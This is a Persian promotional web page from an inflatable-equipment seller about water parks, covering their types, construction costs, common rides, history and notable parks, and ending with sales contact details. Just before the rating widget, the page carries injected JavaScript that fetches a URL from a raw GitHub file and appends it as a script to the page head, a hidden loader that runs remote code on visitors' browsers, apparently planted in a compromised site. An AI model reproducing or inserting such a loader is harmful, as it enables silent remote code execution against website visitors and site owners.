درباره پارک های آبی

درباره پارک های آبی

  • ما در این بخش درباره پارک های آبی توضیح میدهیم. قدیم تر ها فقط در فصل تابستان که هوا گرم بود می توانستیم با خیال راحت از شنا کردن در استخر ها لذت ببریم. چرا که بیشتر استخرها روباز بودند و در فضای آزاد و عملا در زمستان ها به ندرت میشد جایی پیدا کرد که بشود تنی به آب زد.

    پارک آبی چیست؟

    پارک آبی یک پارک تفریحی است که از ابزارهای سرگرم‌کننده و بازی‌های آبی یا رایدهایی مانند سرسره آبی، رودخانه تنبل، حمام تفریحی، استخر، استخر موج، سونا و سرسره‌های سقوط آزاد و غیره تشکیل شده‌است. در بعضی از پارک‌های آبی با ایجاد موج‌های مصنوعی امکان موج سواری را نیز مهیا کرده‌اند.

    همانطور که قبلا در مورد شهربازی ها و انواع آنها صحبت کرده ایم پارک های آبی جزء دسته تم پارک ها با موضوعیت خاض تفریحات آبی شناخته می شوند.

    درباره پارک های آبی

    بدون تردید این نوع پارکها را باید یک تفریح بسیار جذاب و مهیج در سراسر جهان دانست. پارکهای آبی در تمام دنیا طرفداران بسیار زیادی دارند و جالب است که روز به روز تعداد این پارکها افزوده می شود و علاقمندان این پارکها نیز انتظار امکانات جدید و مهیج تری دارند.

    با این حال حتما برای شما جالب است که بدانید در پارک های آبی چه امکانات در جهان را دارند و با تجهیزات و وسایل آن آشنا شوید.

    اینروزها هرشهری در دنیا تفریحات مهیج خودش رو دارد که پارکهای آبی نیز یکی از آن جاذبه های گردشگری لحاظ می شوند.

    درباره پارک های آبی

    درباره پارک های آبی روباز

    اگر اهل هیجان باشید و آفتاب گرفتن در کنار استخر، شنا و ورزش های آبی را دوست داشته باشید و از انجام بازی و تفریحات آبی آن هم در هنگام بهار لذت می برید، پس بهترین گزینه برای رسیدن به خواسته شما و تخلیه انرژی های نهفته تان، رفتن به پارک آبی روباز در فصولی که هوا گرم است یا مناطق گرمسیری جهان می باشد.

    این پارکها در فضایی وسیع و تجهیزات پارک و نظیر سرسره ها و استخرها و … در فضایی روباز و در معرض نور آفتاب قرار می گیرند.

    درباره پارک های آبی

    هزینه ساخت یک پارک آبی

    هزینه ساخت پارک آبی ارتباط مستقیم با نوع طراحی،تعداد دستگاه های موجود در پارک،متراژ ساخت استخرها دارد. درصورتی که پارک به صورت سر بسته و‌ یا indoor باشد، میزان بودجه لازم برای ساخت بیشتر خواهد شد.

    علت افزایش این هزینه ها،ساخت سقف برای محوطه پارک آبی ،نصب انواع رطوبت گیر و انواع سیستم‌های تهویه و فیلترهای هوا می باشد. سیستم های موتور خانه جهت افزایش دمای آب موجود در استخرها،باعث اضافه شدن هزینه های ساخت و اجرا می باشد

    درباره پارک های آبی

    امکانات رایج در پارک های آبی

    • انواع استخر
    • استخر موج
    • انواع سرسره آبی
    • رودخانه آرام lazy river
    • رودخانه وحشی wild river
    • چاله فضای تیوپی raft bowel
    • چاله فضایی body bowel
    • سرسره های بادی آبی
    • زمین فوتبال صابونی
    سازه بادی پارک آبی و سواحل دریایی

    تکامل!

    محبوبیت درباره پارک های آبی از زمان معرفی آن یعنی اواخر سال ۱۹۴۰ بر می‌‌گردد. کشور ایالات متحده آمریکا با بیش از هزار پارک با موضعیت تفریحات آبی و ده‌ها پارک جدید در هر سال بیشترین تعداد پارک‌های آبی را داراست.

    پارک‌های آبی همچنین عمدتا به دو دسته روباز و سربسته یا سالنی تقسیم می‌شوند.

    پارک‌های آبی روباز معمولاً در نقاط گرمسیری و استوایی بازگشایی می‌شوند و پارک‌های سالنی در نقاط شهری بیشتر دیده می‌شوند.

    در حال حاضر بزرگ‌ترین پارک آبی روباز جهان در شهر ویسکانسین آمریکا قرار دارد. این پارک کشتی نوح یا Noah’s Ark نام دارد و بیش از 51 یک سرسره و راید مختلف دارد.

    در ایران نیز بزرگ‌ترین پارک آبی روباز در جزیره کیش واقع شده‌است و تم پارک اوشن نام دارد که با 6 هکتار وسعت و بیش از 14 راید مختلف بزرگ‌ترین پارک آبی روباز ایران محسوب می‌شود.

    سازمان‌های مهم در این حوزه IAAPA (انجمن بین‌المللی پارک‌های سرگرمی و جاذبه) و WWA (انجمن جهانی پارکهای آبی) هستند که با برگزاری نمایشگاه‌های سالانه محصولات و رایدهای جدید تولیدکنندگان مختلف را به معرض نمایش می گذارند.

    درباره پارک های آبی
    درباره پارک های آبی

    نحوه خرید تجهیزات آبی بادی از بادی سازان مجد

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید قصر بادی طرح قلعه می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید. همچنین می توانید دیگر محصولات ما را در فروشگاه مشاهده نمایید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید